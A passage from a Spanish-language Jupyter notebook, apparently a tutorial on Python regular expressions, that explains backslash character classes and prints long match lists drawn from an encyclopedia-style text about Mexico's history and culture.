co.\nMexicano\nMéxico,\nMéxico\nmexicanos\nMéxico\nMéxico\nMéxico\nMéxico,\nmexicanos\nMéxico\".\nMéxico\nMéxico\nMéxico\nMéxico,\nMexicano\nMéxico,\nMéxico,\nMéxico\nMexicali\nMéxico\nMéxico,\nMéxico\nmexicano\nMéxico\nmexicana.\nmexicana\nmexicanos.\nmexicanos.\nmexicanos\nMéxico,\nMéxico,\nMéxico,\nMéxico\nMéxico,\nMéxico,\nMéxico\nMexicana\nmexicano\nMéxico\nMéxico\nmexicanos.\nMéxico\nmexicana.\nMéxico\nMéxico,\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico,\nMéxico\nmexicanos\nMéxico\nmexicanos\nMéxico\nMéxico\nMéxico,\nMéxico\nMéxico\nmexicano.\nMéxico\nmexicano\nMéxico,\nMéxico\nmexicano\nmexicana\nmexicano\nmexicanos\nmexicana\nMéxico.\nMéxico),\nmexicana\nMéxico\nMéxico\nmexicano\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico,\nmexicanas.\nmexicanos.\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico.\nmexicano,\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nMéxico\nMéxico\nMéxico,
\nMexicali,\nmexicana,\nmexicanos.\nMéxico\nmexica\nmexica\nMéxico\nMéxico\nMéxico\nmexicanos\nMéxico\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nmexicano,\nMéxico\nMexicano,\nMéxico\nMéxico\nMéxico\nMexicanos\nmexicana,\nmexicano\"\nmexica;\nmexicanos\nmexicano;\nmexica\",\nMéxico\".\nmexicano\"\nMexicanos\nmexicana.\nmexicano\"\nMéxico\nMéxico,\nmexicano.\nmexicano,\nmexicanidad,\nmexicano)\nmexicanos\nMéxico\nmexicanos,\nmexicana\nmexicana\nmexicano\nMéxico\nmexicana\nmexicanos\nmexicana\nMexicana,\nMéxico.\nmexicana\nMéxico\nmexicana\nmexicana,\nMéxico\nmexicanos.\nmexicana\nmexicana\nMéxico,\nMéxico,\nmexicano,\nmexicana)\nmexicana\"\nmexicanos\nMéxico\nmexicana\nmexicana\nmexicanos,\nMéxico\nMéxico\nmexicano\nmexicano\nMéxico,\nmexicanos\nmexicanos\nmexicano,\nMéxico\nMéxico.\nmexicano\nmexicanos,\nmexicanos\nmexicana,\nmexicana\nMéxico\nmexicanos\nMéxico.\nmexicanos\nmexicanos,\nmexicanos\nMéxico,\nmexicana\nmexicanos,\nmexicana\nMéxico.\nmexicanos\nmexicanas;\nMéxico\nMéxico\nMéxico\nmexicanos\nMéxico\nMéxico\nmexicano,\nmexicana\nMéxico\nmexicana\",\nmexicana.\nmexicanos\nMéxico.\nmexicano\nMéxico\nmexicas,\nmexicano.\nmexicana\nMéxico\nMéxico\nMéxico\nMéxico.\nMéxico,\nmexicana\nmexicano\nMéxico-Tenochtitlan,\nMéxico\nmexicana\nMéxico\nmexicana\nMéxico,\nMéxico\nmexicana\nmexicanas\nmexicanas\nmexicano\nmexicano,\nmexicano\nmexicano,\nMéxico,\nmexicano\nmexicano\nMéxico,\nMéxico\nMéxico\nmexicana.\nmexicana\nmexicana\nmexicanos.\nmexicanos.\nmexicanas\nmexicana.\nmexicana.\nMéxico\nMéxico.\nmexicana,\nMéxico\nmexicana.\nMéxico\nmexicanas.\nmexicana:\nMéxico.\nMéxico\nMéxico\nMéxico,\nMéxico.\nMéxico,\nMéxico\nmexicana\nmexicana,\nMéxico,\nMéxico.\nMéxico\nMéxico\nMéxico\nMexicana;\nmexicanos.\nMéxico\nmexicano\nmexicana\nMéxico\nmexicana\nMéxico\nmexicano,\nMéxico.\nMéxico\nMexicana\nMexicana\nmexicanos\nmexicanos\nMéxico\nmexicanas.\nMéxico\nMéxico\nMéxico\nMexicana\nMéxico\nmexicano\nMéxico\nMéxico\nMéxico,\nMéxico\nmexicano,\nMexicana\nMexica
no\nMéxico.\nmexicano\nMexicana\nMexicana\nMexicana\nMexicana\nMéxico,\nmexicano\nmexicano,\nMexicana\nMéxico\nMéxico,\nMéxico,\nMéxico,\nMéxico\nMéxico,\nMéxico,\nMexicana\nMéxico\nMéxico.\nMéxico\nMexicana\nMéxico\nmexicanas\nMexicana\nMéxico\nmexicano\nMéxico:\nMéxico\nMéxico\nMéxico\nmexicanos\nMéxico,\nMéxico.\nMéxico\nMéxico,\nMéxico\nmexicano\nmexicanos\nMéxico\nmexicanos\nmexicanos\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico.\nMéxico\nmexicano\nmexicana\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\n" ], [ "expresion_rango = re.compile(r\"[0-9]+\")\nbusqueda = expresion_rango.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "1830\n1830\n32\n31\n3155\n958\n276\n9330\n126\n2019\n67\n287\n14\n000\n300\n1810\n1821\n0\n774\n74\n17\n10\n12\n12\n000\n6\n1813\n22\n1814\n28\n1821\n1824\n1857\n1917\n30\n000\n9000\n12\n000\n8000\n1000\n10\n500\n2500\n1500\n200\n200\n900\n900\n900\n1300\n1521\n1517\n1518\n1520\n13\n1521\n1525\n1527\n1535\n300\n1546\n1540\n1551\n1734\n1737\n1761\n8\n300\n1808\n16\n1810\n1811\n1813\n1815\n1815\n1817\n1820\n1821\n28\n1821\n1822\n1823\n1824\n1833\n1835\n1836\n1841\n1848\n1846\n1848\n1845\n1824\n1853\n1855\n1854\n1857\n1867\n1872\n1876\n1906\n1907\n1910\n14\n20\n24\n1911\n1913\n1914\n1917\n1920\n1919\n1923\n1924\n1929\n1934\n1934\n1940\n1950\n1960\n1959\n1968\n1970\n1977\n1985\n1988\n1994\n1994\n1\n1994\n22\n1997\n45\n2000\n71\n2006\n100\n000\n15\n273\n2010\n2012\n2006\n2012\n1\n2018\n53\n3\n1\n2018\n2024\n1917\n128\n500\n1917\n111\n110\n1917\n2466\n570\n5\n32\n31\n1988\n2019\n1970\n1980\n2000\n2006\n20\n5\n3\n80\n67\n7\n3\n150\n50\n87\n7\n66\n297\n198\n201\n2020\n127\n586\n94\n028\n33\n557\n32\n14\n86\n118\n5127\n3155\n958\n276\n9330\n3\n117\n7\n8\n475\n1\n17\n32\n17\n56\n3\n153\n35626\n15\n3395\n5610\n5462\n5286\n4690\n4461\n4340\n4117\n2054\n5073\n30\n50\n15\n6\n40\n614\n16\n7\n21\n1\n2745\n10\n20\n1000\n1500\n1500\n24\n26\n350\n15\n25\n70\n635\n460\n254\n80\n1000\n3000\n19\n12\n16\n1\n3034\n1885\n
17\n200\n000\n10\n12\n733\n448\n290\n26\n000\n2500\n170\n000\n34\n64\n4\n26\n4\n17\n1922\n2005\n23\n20\n3\n13\n2010\n1830\n1876\n1910\n20\n000\n1910\n1940\n1970\n6\n27\n1970\n1983\n1994\n4\n85\n30\n2006\n2006\n4\n5\n3\n5\n4\n70\n100\n000\n70\n000\n2006\n20\n000\n2008\n4\n54\n2006\n0\n9\n0\n5\n44\n4\n18\n2006\n2600\n5700\n2006\n2010\n51\n217\n4\n17\n2012\n151\n480\n72\n000\n2005\n2006\n2006\n1994\n1995\n85\n10\n1980\n40\n12\n1970\n2007\n2009\n23\n4\n2011\n2012\n2005\n5\n7\n14\n2\n11\n270\n2009\n15\n25\n2011\n43\n2009\n1\n1\n2010\n1\n1\n5000\n8\n43\n6\n2016\n53\n418\n151\n7\n6\n375\n581\n22\n6\n0\n774\n74\n2010\n0\n743\n0\n608\n2009\n2004\n23\n830\n51\n9\n9900\n21\n6\n5000\n2003\n5\n95\n1\n35\n959\n50\n2007\n3\n24\n4\n000\n667\n150\n000\n2400\n2011\n35\n796\n2004\n3\n826\n2005\n12\n000\n882\n000\n366\n095\n2008\n10000\n40\n000\n17\n166\n2010\n80\n2010\n1819\n2016\n2018\n10\n5\n14\n2007\n1990\n22\n733\n854\n634\n80\n2004\n32\n302\n2007\n56\n13\n40\n6\n2011\n100\n13\n1\n1585\n5\n1\n852\n728\n100\n1920\n2\n1910\n1920\n1930\n1980\n3\n1950\n1980\n2000\n120\n1\n6\n1995\n2000\n36\n1895\n72\n2000\n90\n1960\n50\n6\n1895\n96\n6\n1920\n90\n80\n18\n50\n2004\n2010\n1\n640\n000\n1\n600\n940\n1\n400\n000\n1\n8\n2\n1925\n6\n10\n14\n10\n220\n000\n2000\n11\n65\n1\n381\n853\n1\n100\n2015\n75\n80\n20\n824\n2016\n23\n000\n2016\n2017\n25\n339\n25\n324\n2006\n2019\n2020\n1857\n1917\n1824\n1920\n1917\n1990\n1993\n93\n2010\n1\n1\n3\n30\n5000\n93\n8\n93\n4\n93\n2\n84\n5\n3\n1979\n18\n000\n1992\n500\n67\n400\n67\n7\n67\n100\n10\n50\n1882\n7500\n5000\n5000\n50\n000\n87\n000\n100\n000\n400\n500\n13\n2010\n1\n292\n201\n27\n2\n10\n130\n000\n3\n1921\n26\n48\n65\n2009\n5\n20\n40\n25\n8\n1970\n8\n4\n2005\n7\n3\n2010\n33\n29\n21\n1551\n25\n1553\n22\n1910\n100\n2010\n123\n1910\n1711\n2000\n98\n1940\n1970\n6\n8\n30\n1940\n1960\n50\n1960\n1970\n1980\n1970\n90\n1920\n40\n50\n1960\n1849\n7500\n2001\n1820\n1880\n1940\n1950\n1944\n1994\n2003\n1844\n1851\n20\n000\n2005\n16\n2010\n1847\n6\n7\n2004\n3\n6\n2005\n
37\n266\n28\n34\n232\n2012\n0\n47\n20\n2010\n13\n2010\n30\n2010\n15\n1970\n1986\n10\n1999\n1993\n2001\n14\n2012\n17\n17\n2005\n2011\n20\n1977\n2011\n2007\n1925\n16\n2\n2006\n2009\n2017\n4\n1951\n1936\n2013\n2014\n2016\n1955\n2016\n4\n3\n1\n2018\n1930\n2\n2010\n1895\n17\n26\n1916\n12\n1990\n2\n3\n8\n21\n3\n120\n3\n3\n123\n50\n41\n32\n1968\n1992\n2\n3\n1968\n3\n2\n2\n1992\n1984\n2002\n2010\n2008\n2015\n1\n23\n1900\n1968\n12\n24\n1984\n2000\n2004\n2002\n2\n2002\n2003\n1970\n1986\n1986\n3\n1955\n1975\n2011\n1926\n1954\n1990\n2014\n1979\n1968\n1970\n1972\n1974\n1994\n1996\n2014\n2016\n1928\n1984\n1988\n1992\n1994\n2002\n2010\n1972\n1976\n1980\n1984\n1988\n1992\n1996\n2000\n2004\n2008\n2012\n2006\n2010\n2010\n2012\n" ] ], [ [ "##### \\", "_____no_output_____" ], [ "Por último, la barra invertida. Ya la había mencionado, sirve para eliminar el significado especial, pero tiene otro uso.\n\nAsí como quita significado a los caracteres especiales, le da significado especial a caracteres normales para formar conjuntos preestablecidos (conjuntos como los que se podrían formar con los corchetes: `[ ]`)", "_____no_output_____" ], [ "* `\\d` : Conjunto de dígitos (`[0-9]`)\n* `\\s` : Conjunto de espacios en blanco (espacio, tabulador, entre otros)\n* `\\w` : Conjunto de elementos de palabra (letras, números y guión bajo)\n* `\\b` : Separador de palabras (no coincide con ningún caracter como tal)", "_____no_output_____" ] ], [ [ "# Palabras de 12 letras\nexpresion_12letras = re.compile(r\"\\b\\w{12}\\b\")\nbusqueda = expresion_12letras.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", 
"oficialmente\nprecolombina\nOrganización\nconsiderados\ndecimocuarta\nmegadiversos\ndenominación\nConstitución\ncorrespondía\ndependientes\nconstituiría\ndenominación\nantecedieron\nconformación\nConstitución\nConstitución\nConstitución\ngeneralizado\nprevaleciera\nTenochtitlan\npeninsulares\ndenominación\nsignificaría\nalternativos\nconocimiento\nrecolectores\ncultivadores\ncomplementar\nsubsistencia\nConstruyeron\narqueológica\nAridoamérica\ncivilización\ncaracterizan\nmonumentales\narquitectura\nconstruirlas\ncivilización\nceremoniales\nconstruyeron\nsignificaban\nherramientas\nQuetzalcóatl\nrelacionados\nteotihuacana\ncomerciantes\nagricultores\nQuetzalcóatl\ncivilización\nastronómicos\nrelacionadas\nrelacionaban\nQuetzalcóatl\nconstruyeron\nastronómicas\nrelacionadas\nrelacionados\nconstruyeron\narquitectura\ncalendáricos\nobservatorio\nconstelación\ncomerciantes\ncomerciantes\nXicocotitlan\nfuncionarios\nconocimiento\ncivilización\nprehispánica\nsubsistencia\ntopográficas\nTenochtitlán\nconquistados\nexpediciones\nTenochtitlan\nTenochtitlan\naculturación\nTenochtitlan\nnotoriamente\ngradualmente\nprivilegiada\nconvirtieron\ntransportaba\nintroducción\narquitectura\nmicrocrédito\njurisdicción\nconsiderados\nnovohispanos\notorgamiento\ncolonización\nevolucionado\nsoberanistas\nconstitución\nConstitución\nproclamación\ninstauración\ninsurrección\nConstitución\nrepublicanos\nfederalistas\ncentralistas\nconservadora\npromulgación\nseparatistas\nfederalistas\nreinstalaron\nConstitución\nprosiguieron\ninsurrección\npromulgación\nintervención\nfusilamiento\nConstitución\nrecuperación\nconsecuencia\nclientelares\nnotablemente\nprivatizadas\ncuestionando\nresponsables\nnarcotráfico\nfuncionarios\nacrecentaron\npresidencial\npresidencial\nconcerniente\nConstitución\npreeminencia\nconstitución\nConstitución\nobligaciones\npromulgación\nlegisladores\nConstitución\nobligaciones\ndeliberativa\ndeclaratoria\ndeclaratoria\nnombramiento\ndesaparición\nConstitución\nConstitució
n\nConstitución\nobligaciones\nConstitución\nresoluciones\ninterponerse\nconstitución\nconstitución\nlegislativos\norganización\ndesaparición\ninternamente\nayuntamiento\nayuntamiento\nDelegaciones\nayuntamiento\norganización\nconcerniente\norganización\nconcordancia\nlegislativas\nayuntamiento\norganización\nordenamiento\ndenominación\ntransparente\norganización\nmanipulación\nRegeneración\nintervención\nproscripción\ndificultades\ndiplomáticas\npacificación\nprotagonismo\nfallidamente\nOrganización\nacercamiento\nacercamiento\ndiplomáticas\ndiplomáticas\nconstituidas\nautorización\ncorresponden\noperatividad\ncumplimiento\ncorresponden\nconstituidos\nNorteamérica\nNorteamérica\nNeovolcánico\nprolongación\nNeovolcánico\nNeovolcánico\nNeovolcánico\nCitlaltépetl\nPopocatépetl\nIztaccíhuatl\nNeovolcánico\nAltiplanicie\nsemidesierto\nNeovolcánico\ntemperaturas\ntemperaturas\ntemperaturas\ntemperaturas\nAltiplanicie\nsemidesierto\ntemperaturas\nconstrucción\nartificiales\nmegadiversos\nconsiderados\nprovenientes\nchihuahuense\nmanufacturas\ndesarrollada\nconstrucción\npetrolíferos\npetrolíferos\nsubsidiarias\nestratégicos\nelectricidad\nElectricidad\nmanufacturas\npresidencial\nexpresidente\nexpresidente\nprovenientes\ndesempleados\ndecimocuarta\ndistribución\nrecuperación\ncalificación\nexpresidente\ncertificaron\ndecimotercer\nprovenientes\nprovenientes\npatrocinados\npreferencias\nrehabilitado\ncomunicación\nremodelación\nmejoramiento\nrecuperación\ncomunicación\ndesprestigio\ncriminalidad\ngeneralizado\nhomosexuales\npopularmente\ndesarrollado\nindicaciones\nalimentación\nelectricidad\nElectricidad\nadministraba\nelectricidad\ndistribución\nrepresentaba\nelectricidad\nexportadores\ndecimocuarto\nprovenientes\nreinvertidos\naprovechando\nproyecciones\nproyecciones\ninterurbanos\ntecnológicos\nprivatizados\nconstrucción\ncomunicación\nparticulares\ndependencias\ncomunitarias\nconferencias\ncomunicación\nimplementado\ncomunitarias\ncomputadoras\nestablecidas\nconglomer
ado\nconglomerado\ncomunicación\nprogramación\nradiofónicos\nexclusividad\nConstitución\nconstrucción\nconstrucción\nconstrucción\nconsiderarla\npredominante\nconsideraron\nconstrucción\nconstituiría\ndistinguidos\ndemográficos\ninnumerables\nconsiderable\nestadísticas\nestadísticas\nEstratégicos\nSecretariado\noficialmente\nConstitución\nConstitución\nConstitución\nintroducción\ncontempladas\nconstitución\npersonalidad\nasociaciones\ndiplomáticas\nconvirtiendo\ncongregación\nagrupaciones\ncristianismo\nprotestantes\ncristianismo\nprovenientes\nprotestantes\nprotestantes\nprotestantes\nprotestantes\nprotestantes\nantropólogos\nantropólogos\nintervención\npracticantes\nprovenientes\ncuantitativa\nTecamachalco\npracticantes\ncristianismo\nantropólogos\ncotidianidad\nprehispánico\nreligiosidad\nreligiosidad\nLingüísticos\noficialmente\nconsiderados\ncomunicación\nconsiderable\nPlautdietsch\nPlattdeutsch\ncolonización\nconcentrados\nconcentrados\nprovenientes\ndiscapacidad\ncivilización\nreemplazando\nConstitución\nOrganización\nIberoamérica\nclasificadas\nPanamericana\ntecnológicas\ntecnológicas\nConstitución\nConstitución\nrelacionando\nconstrucción\nestereotipos\nconstrucción\nnacionalismo\nprivilegiado\ncompositores\ncatedralicia\ncompositores\ninterrumpida\nfestividades\ncompositores\ncompositores\ncompositores\nrestauración\ncompositores\nprehispánica\nprehispánica\ninstrumentos\nmembranófono\ninfluenciada\nindumentaria\nadaptándolos\nprovincianos\ncompositores\npremiaciones\nromanticismo\ninterpretada\ncompositores\ncompositores\nrepresentado\ninstrumentos\ntransformado\nsustituyendo\ninstrumentos\nsintetizador\npopularizado\nconocimiento\ncotidianidad\nChimalhuacan\nprovenientes\nincorporaron\nnacionalidad\nVillaurrutia\nprecolombino\nconsideradas\nprehispánico\nTecamachalco\nZinacantepec\nmanifestaron\natribuírsele\nreligiosidad\nnovohispanos\nnovohispanos\nHermenegildo\nmezclándolos\nespectadores\nperformances\nhistrionismo\ngeneralmente\nromanticismo\nnaciona
lismo\naristocracia\ntrascendente\narquitectura\nXicocotitlan\nTenochtitlan\nincorporadas\nintrodujeron\narquitectura\nprehispánico\nconstrucción\nintroducidos\nprehispánica\narquitectura\narquitectura\narquitectura\nnacionalista\narquitectura\narquitectura\nMediterráneo\narquitectura\nornamentales\nmonumentales\npersonalidad\nmetalistería\ntalabartería\naportaciones\ncoproducidas\ndaguerrotipo\ncomercializa\nHermenegildo\nestablecerse\ngastronómica\ncolonización\nconstelación\ningredientes\nreelaborados\ningredientes\nconstrucción\nAnálogamente\nAntropología\ncorresponden\nconsiderados\nsacrificados\ndistribuidos\nPanamericano\nOrganización\nrepresentada\nespecialidad\nEspecialidad\nespecialidad\nChampionship\nparticiparon\noficialmente\ninauguración\nprecisamente\nParalímpicos\n" ] ], [ [ "Los conjuntos se puden usar dentro de `[^ ]` para negarlos, pero muchas veces no hace falta ya que las letras mayúsculas (`\\D, \\S, \\W`) ya significan lo opuesto de cada conjunto respectivamente.", "_____no_output_____" ] ], [ [ "# Palabras\nexpresion = re.compile(r\"\\b\\S+\\b\")\nbusqueda = expresion.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "\u001b[1;30;43mSe truncaron las últimas líneas 5000 del resultado de 
transmisión.\u001b[0m\nescritor\nCarlos\nMonsiváis\ny\nel\nfotógrafo\nGabriel\nFigueroa\nCabe\nmencionar\nal\ndirector\nespañol\nnacionalizado\nmexicano\nLuis\nBuñuel\ny\nsus\naportaciones\nal\ncine\nsurrealista\nUn\nChien\nAndalou\ny\nL'age\nD'Or\nambas\ncoproducidas\ncon\nSalvador\nDalí\ny\nque\nrealizó\nen\nFrancia\nposteriormente\nen\nMéxico\nrealizó\nLos\nOlvidados\ndeclarada\nMemoria\ndel\nMundo\npor\nla\nUNESCO\nen\n2003\nque\nle\nvalió\nsu\nrevalorización\nen\nel\nFestival\nde\nCannes\nasí\ncomo\nSubida\nal\ncielo\nNazarín\ny\nSimón\ndel\ndesierto\nque\ntambién\nobtuvieron\nreconocimiento\nmundial\na\ntravés\nde\nCannes\nEn\nEspaña\nrealizaría\nViridiana\ncon\nla\nque\nobtuvo\nla\nPalma\nde\nOro\ny\nvolvería\na\nFrancia\na\nfilmar\nentre\notras\nLe\ncharme\ndiscret\nde\nla\nburgeoisie\ncon\nla\nque\nobtuvo\nel\nÓscar\na\nmejor\npelícula\nextranjera\nEl\ncine\nmexicano\ncontemporáneo\nincluye\nfiguras\nnotables\ncomo\nlos\ndirectores\nArturo\nRipstein\nFelipe\nCazals\nen\ntanto\nque\nen\námbito\ninternacional\ndestacan\nAlejandro\nGonzález\nIñarritu\nGuillermo\ndel\nToro\ny\nAlfonso\nCuarón\nentre\notros\nasí\ncomo\nal\nfotógrafo\nEmmanuel\nLubezki\nEl\nprimer\ndaguerrotipista\nmexicano\nse\nllamaba\nJ\nM\nDíaz\nGonzález\nera\nestudiante\nde\nSan\nCarlos\ny\nabrió\nen\n1844\nun\nestudio\nen\nla\ncalle\nde\nSanto\nDomingo\nCd\nde\nMéxico\nen\ndonde\nrealizaba\nminiaturas\nal\nóleo\ny\ndaguerrotipos\nDespués\nal\nsuperarse\nla\ntécnica\ndel\ndaguerrotipo\nse\ntienen\nnoticias\nde\nla\nutilización\ndel\npapel\nen\nla\nfotografía\nen\nMéxico\ndesde\n1851\nLos\nprecios\nbajan\nla\nesfera\nprivada\ndeja\nde\nser\nsu\nespacio\nexclusivo\nTambién\nse\nutiliza\nla\nfotografía\ncomo\npromoción\npolítica\nA\nraíz\nde\nla\nmuerte\ndel\npresidente\nBenito\nJuárez\nla\nempresa\nCruces\ny\nCampa\ncomercializa\nuna\nedición\nde\n20\n000\nejemplares\nde\nsu\nretrato\nen\nformato\ntarjeta\nde\nvisita\nA\nprincipios\ndel\nXX\nJesús\nHermenegildo\nAbitia\nfue\nfotógrafo\nde\nest
udio\ny\nde\nexteriores\ncamarógrafo\ndel\ncine\ndocumental\ny\nde\nficción\nAgustín\nVíctor\nCasasola\nfue\nun\nfotógrafo\nque\nlogró\nestablecerse\ncomo\nretratista\npor\nantonomasia\nde\nla\nclase\ngobernante\nPorfirio\nDíaz\nFrancisco\nVilla\nHuerta\nentre\notros\nLas\nfotografías\nde\nManuel\nÁlvarez\nBravo\nurgen\nen\nlos\nrincones\nlogrando\nescudriñar\nlo\nque\notros\nno\nlogran\ndetectar\nmientras\nque\nel\nfotógrafo\nNacho\nLópez\nfue\ncapaz\nde\ntrasladar\na\nsus\nfotografías\nsus\nguiones\ne\nhistorias\nEn\n2005\nMéxico\npresentó\nla\ncandidatura\nde\nsu\ngastronomía\npara\nPatrimonio\nde\nla\nHumanidad\nde\nla\nUnesco\nsiendo\nla\nprimera\nocasión\nen\nque\nun\npaís\nhabía\npresentado\nsu\ntradición\ngastronómica\npara\ntal\nefecto\nSin\nembargo\nen\nuna\nprimera\ninstancia\nel\nresultado\nfue\nnegativo\npues\nel\ncomité\nno\npuso\nel\nénfasis\nadecuado\nen\nla\nimportancia\ndel\nmaíz\nen\nla\ncocina\nmexicana\nFinalmente\nel\n16\nde\nnoviembre\nde\n2010\nla\ngastronomía\nmexicana\nfue\nreconocida\ncomo\nPatrimonio\nCultural\nInmaterial\nde\nla\nHumanidad\nEl\norigen\nde\nla\nactual\ncocina\nmexicana\nse\nestablece\ndurante\nla\ncolonización\nespañola\nsiendo\nuna\nmezcla\nde\nlas\ncomidas\nde\nEspaña\ny\nlos\nindios\nnativos\nDe\norigen\nindígena\nes\nel\nmaíz\nel\nchile\nconocido\nen\ncasi\ntodo\nel\nmundo\nhispanoparlante\ncomo\nají\nlos\nfrijoles\ncalabazas\naguacates\ncamote\njitomates\ncacao\nel\nguajolote\ny\nmuchas\nfrutas\ny\ncondimentos\nmás\nDe\nigual\nmanera\nalgunas\ntécnicas\nde\ncocina\nque\nse\nemplean\nen\nla\nactualidad\nson\nherencia\nde\nlos\npueblos\nprehispánicos\ncomo\nla\nnixtamalización\ndel\nmaíz\nel\ncocimiento\nde\nalimentos\nen\nhornos\na\nras\nde\ntierra\nla\nmolienda\nen\nmolcajete\ny\nmetate\nCon\nlos\nespañoles\nllegaron\nlas\ncarnes\nde\npuerco\nres\ny\npollo\nla\npimienta\nel\nazúcar\nla\nleche\ny\ntodos\nsus\nderivados\nel\ntrigo\ny\nel\narroz\nlos\ncítricos\ny\notra\nconstelación\nde\ningredientes\nque\nforman\nparte
\nde\nla\ndieta\ncotidiana\nde\nlos\nmexicanos\nDe\nese\nencuentro\nde\ndos\ntradiciones\nculinarias\ncon\nmilenios\nde\nantigüedad\nnacieron\nel\npozole\nel\nmole\nla\nbarbacoa\ny\nlos\ntamales\nen\nsus\nformas\nactuales\nel\nchocolate\nuna\nvariada\ngama\nde\npanes\nlos\ntacos\ny\nel\namplio\nrepertorio\nde\nantojitos\nmexicanos\nNacieron\nbebidas\ncomo\nel\natole\nel\nchampurrado\nel\nchocolate\ncon\nleche\ny\nlas\naguas\nfrescas\npostres\ncomo\nel\nacitrón\nbiznaga\ny\ntoda\nla\ngama\nde\ndulces\ncristalizados\nel\nrompope\nla\nCajeta\nla\njericaya\ny\nel\namplio\nrepertorio\nde\ndelicias\ncreadas\nen\nlos\nconventos\nde\nmonjas\nen\ntodas\npartes\ndel\npaís\nAlgunas\nbebidas\nmexicanas\nhan\nrebasado\nsus\nfronteras\ny\nse\nconsumen\ncotidianamente\nen\nAmérica\nCentral\nEstados\nUnidos\nCanadá\nEspaña\ny\nFilipinas\ntal\nes\nel\ncaso\ndel\nagua\nde\nJamaica\nla\nhorchata\nde\narroz\nel\nagua\nde\nraíz\nlas\nmargaritas\ny\nel\npropio\ntequila\nLa\nhistoria\ndel\npaís\ny\nsus\nvínculos\ncon\notros\npueblos\npermitieron\nla\nincorporación\nde\notras\ncocinas\na\nla\ncocina\nmexicana\nLa\nNao\nde\nChina\nque\nen\nrealidad\nera\nun\ngaleón\nde\nManila\ntrajo\ndel\noriente\nuna\ngama\nde\nvariadas\nespecias\ny\nsobre\ntodo\nel\narroz\nUn\nbuen\nmole\npoblano\nes\nimpensable\nsin\narroz\na\nla\nmexicana\nLa\ncocina\nárabe\nllegó\na\nMéxico\nindirectamente\npor\nmedio\nde\nlos\nespañoles\nconquistadores\nTambién\nla\nrelación\ncon\nlos\npaíses\nlatinoamericanos\ndejó\nsu\nimpronta\nen\nla\ncocina\npopular\nquizá\nlos\ncasos\nmás\nconocidos\nson\nlos\nceviches\ny\nlos\nmoros\ncon\ncristianos\ndeudores\nde\nla\ngastronomía\ncubana\nque\nhan\nsido\nasimilados\ny\nreelaborados\ncon\ningredientes\npropios\nde\nMéxico\nLas\ninvasiones\ndejaron\nsu\nhuella\nen\ntoda\nla\ncultura\nmexicana\ny\nla\ncocina\nno\nes\nla\nexcepción\nEl\ngusto\npor\nla\ncarne\nde\nres\nmolida\nllegó\ncon\nel\nejército\nbelga\nde\nCarlota\nEl\npan\nde\ncaja\nfue\nsegún\nla\nleyenda\nun\ninvento\nde\
nlas\ntropas\nestadounidenses\nque\nvinieron\na\nMéxico\nen\n1847\nLa\nllegada\nde\ninmigrantes\nde\notras\nlatitudes\nen\ntodo\nel\nsiglo\nXIX\ny\nXX\ntambién\nparticipó\nen\nla\nconstrucción\nde\nla\ngastronomía\nmexicana\nComo\nejemplo\nlos\nquesos\nitalianos\ny\nla\npolenta\nque\nhoy\nse\nfabrican\nen\nChipilo\nPuebla\no\nlos\nfranceses\nde\nOrizaba\nal\nigual\nque\nsu\npan\ny\nlos\nalemanes\nmenonitas\nde\nChihuahua\nLos\nmineros\ningleses\nde\nMéxico\nsentaron\nlas\nbases\ndel\npaste\nun\nhojaldre\nque\nhoy\nse\nrellena\nlo\nmismo\nde\nqueso\ny\npapas\nque\nde\nmole\nverde\nde\npepitas\nde\ncalabaza\nLas\ntortas\nson\nunos\nemparedados\nelaborados\ncon\npan\nllamado\ntelera\ny\nal\nigual\nque\nlos\ntacos\ndiversos\nalimentos\ntales\ncomo\njamón\ncon\nqueso\ncarne\nal\npastor\ncochinita\npibil\ncarne\nde\npollo\nSe\ndice\nque\nse\noriginaron\ndurante\nla\nGuerra\nde\nReforma\ncuando\nse\nnecesitaba\nencontrar\nuna\nforma\nde\ndistribuir\nalimentos\nentre\nlas\ntropas\nmexicanas\nMuchas\nson\nlas\nbebidas\npropias\nde\nla\ncocina\nmexicana\nlas\naguas\nfrescas\nlos\natoles\nel\nchocolate\nel\nmezcal\nel\ntequila\nel\nvino\nel\ntepache\nla\ncharanda\nel\ntejuino\nla\ncerveza\nSegún\nun\nestudio\nCuánto\nvale\nla\ncultura\nrealizado\npor\nel\neconomista\nErnesto\nPiedras\nlas\nindustrias\nculturales\ngeneran\nel\n6,7\ndel\nproducto\ninterno\nbruto\nde\nMéxico\nEl\nestudio\nfue\npresentado\nen\n2004\ny\nfue\npublicado\npor\nel\nConsejo\nNacional\npara\nla\nCultura\ny\nlas\nArtes\nLas\nindustrias\nculturales\nson\nidentificadas\npara\nMéxico\ncomo\nun\nsector\nque\nrepresenta\nun\nmotor\nde\ncrecimiento\ny\ndesarrollo\neconómicos\nsuperado\nsolo\npor\nlos\nsectores\nde\nla\nmaquila\nel\npetróleo\ny\nel\nturismo\nEn\ntérminos\nde\ngeneración\nde\nempleo\nsu\nparticipación\nen\nla\npoblación\neconómicamente\nactiva\nalcanza\n3.6\nAnálogamente\nel\ncálculo\npara\neste\nsector\nreporta\nen\ntérminos\ndel\ncomercio\nexterior\nuna\nbalanza\ncomercial\nde\nsuperávit\ny\nen
